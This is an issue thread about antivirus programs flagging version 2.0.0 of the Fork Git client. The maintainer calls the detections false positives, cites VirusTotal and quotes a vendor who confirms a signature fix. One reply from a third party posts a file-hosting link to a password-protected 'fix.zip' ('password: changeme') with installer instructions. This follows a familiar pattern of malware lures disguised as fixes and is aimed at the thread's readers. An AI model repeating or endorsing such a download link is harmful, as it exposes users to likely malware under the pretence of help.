### ISSUE TITLE
[BUG] Anti-virus software blocks launch of Fork version 2.0.0

### ISSUE THREAD

**Issue by JannisRln** [ForkIssues/Tracker#2190]
Hello everyone,

After an update to version 2.0, our anti-virus is blocking the lunch of the software. As far as our anti-virus software is concerned, it's not possible to get more information on this issue and the cause. I will contact our IT department to get more information, but I can't promise anything.

**Comment by DanPristupov** [comment]
Report it to the anti-virus vendor as false positive.

**Comment by DanPristupov** [comment]
According to VirusTotal (https://www.virustotal.com/gui/file/153ae6a557f77946c22cb00aa9120b8f2aa760094eadab5375531e112fb5b597) there are 2 cases: DeepInstinct and Vir.IT.

Vir.IT tech has responded to my email already :
> Hi Dan,
> 
>     we confirm it's a false positive, we have corrected the signatures to avoid to intercept your app.
>     Correction will be available starting from today updates of Vir.IT (version 9.5.773).
> 
> Best regards,
> 
> TG Soft Tech Support

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JannisRln** [comment]
Our IT department has added the exe to the gloabel safety list. Thanks for the support.
